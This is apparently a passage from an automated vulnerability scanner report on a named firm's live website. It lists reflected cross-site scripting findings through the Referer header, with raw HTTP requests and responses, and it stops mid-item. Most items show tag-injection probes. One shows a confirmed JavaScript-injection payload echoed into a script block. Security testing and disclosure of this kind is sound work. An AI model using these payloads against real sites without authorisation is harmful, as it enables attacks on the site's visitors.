The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56449"><a>3c0af12941a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.arnoldporter.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=56449"><a>3c0af12941a

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=18264165;expires=Fri, 11-Jan-2041 15:14:59 GMT;path=/
Set-Cookie: CFTOKEN=19385056;expires=Fri, 11-Jan-2041 15:14:59 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=56449"><a>3c0af12941a">
...[SNIP]...

4.312. http://www.arnoldporter.com/about_the_firm_diversity_our_values.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /about_the_firm_diversity_our_values.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a813"><a>7b216e3e1ad was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /about_the_firm_diversity_our_values.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=1a813"><a>7b216e3e1ad

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=1a813"><a>7b216e3e1ad">
...[SNIP]...

4.313. http://www.arnoldporter.com/about_the_firm_pro_bono_our_commitment.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /about_the_firm_pro_bono_our_commitment.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7be1"><a>6b37d6049c6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /about_the_firm_pro_bono_our_commitment.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=a7be1"><a>6b37d6049c6

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=a7be1"><a>6b37d6049c6">
...[SNIP]...

4.314. http://www.arnoldporter.com/about_the_firm_recognition.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /about_the_firm_recognition.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18dcd"><a>1951d83601 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /about_the_firm_recognition.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=18dcd"><a>1951d83601

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=18dcd"><a>1951d83601">
...[SNIP]...

4.315. http://www.arnoldporter.com/about_the_firm_recognition_rankings.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /about_the_firm_recognition_rankings.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e576"><a>6afa9807f84 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /about_the_firm_recognition_rankings.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=7e576"><a>6afa9807f84

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=7e576"><a>6afa9807f84">
...[SNIP]...

4.316. http://www.arnoldporter.com/about_the_firm_who_we_are.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /about_the_firm_who_we_are.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d86c8"><a>12209855120 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /about_the_firm_who_we_are.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=d86c8"><a>12209855120

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:26:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=d86c8"><a>12209855120">
...[SNIP]...

4.317. http://www.arnoldporter.com/advisory.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /advisory.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47c51"><a>3e7a64ab71 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /advisory.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=47c51"><a>3e7a64ab71

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Advisory Sign-Up</title>
       <meta name="Description"
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=47c51"><a>3e7a64ab71">
...[SNIP]...

4.318. http://www.arnoldporter.com/careers.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /careers.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f57f0"><a>27be33cf6b9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /careers.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=f57f0"><a>27be33cf6b9

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:26:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=f57f0"><a>27be33cf6b9">
...[SNIP]...

4.319. http://www.arnoldporter.com/contact.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /contact.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5a4c"><a>7d008f3eaa6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /contact.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=f5a4c"><a>7d008f3eaa6

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Contact Us</title>
       <meta name="Description" conte
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=f5a4c"><a>7d008f3eaa6">
...[SNIP]...

4.320. http://www.arnoldporter.com/events.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /events.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e8d2"><a>935e63f487b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /events.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=1e8d2"><a>935e63f487b

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Seminars/Events</title>
       <meta name="Description"
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=1e8d2"><a>935e63f487b">
...[SNIP]...

4.321. http://www.arnoldporter.com/events.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /events.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d1f7'-alert(1)-'2b3427d18c5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /events.cfm?id=670&action=view HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=5d1f7'-alert(1)-'2b3427d18c5

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Natural Resource Damages: The Ground, Groundwater an
...[SNIP]...
d_capture_file).click(function() {
                   $.post("process_user_capture.cfm",
                       { name: name,
                        company: company,
                        email: email,
                        from: 'http://www.google.com/search?hl=en&q=5d1f7'-alert(1)-'2b3427d18c5',
                        document: $(this).attr('id').replace('doc', '')
                        },
                       function(data) {
                        }, "json");
                });
               if (requested_capture_forward == '') {
                   setTimeout('$("#doc" + r
...[SNIP]...

4.322. http://www.arnoldporter.com/experience.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /experience.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 685f0"><a>2390de3ec9b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /experience.cfm?action=case_study HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=685f0"><a>2390de3ec9b

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Experience</title>
       <meta name="Description" conte
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=685f0"><a>2390de3ec9b">
...[SNIP]...

4.323. http://www.arnoldporter.com/global_reach.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /global_reach.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3530c"><a>dd14a6ab469 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /global_reach.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=3530c"><a>dd14a6ab469

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Global Reach</title>
       <meta name="Description" con
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=3530c"><a>dd14a6ab469">
...[SNIP]...

4.324. http://www.arnoldporter.com/globals_disclaimer.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /globals_disclaimer.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd76e"><a>5d9b079dc37 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /globals_disclaimer.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=dd76e"><a>5d9b079dc37

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=dd76e"><a>5d9b079dc37">
...[SNIP]...

4.325. http://www.arnoldporter.com/globals_llp_status.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /globals_llp_status.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c77c2"><a>9d93e2dce00 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /globals_llp_status.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=c77c2"><a>9d93e2dce00

Response

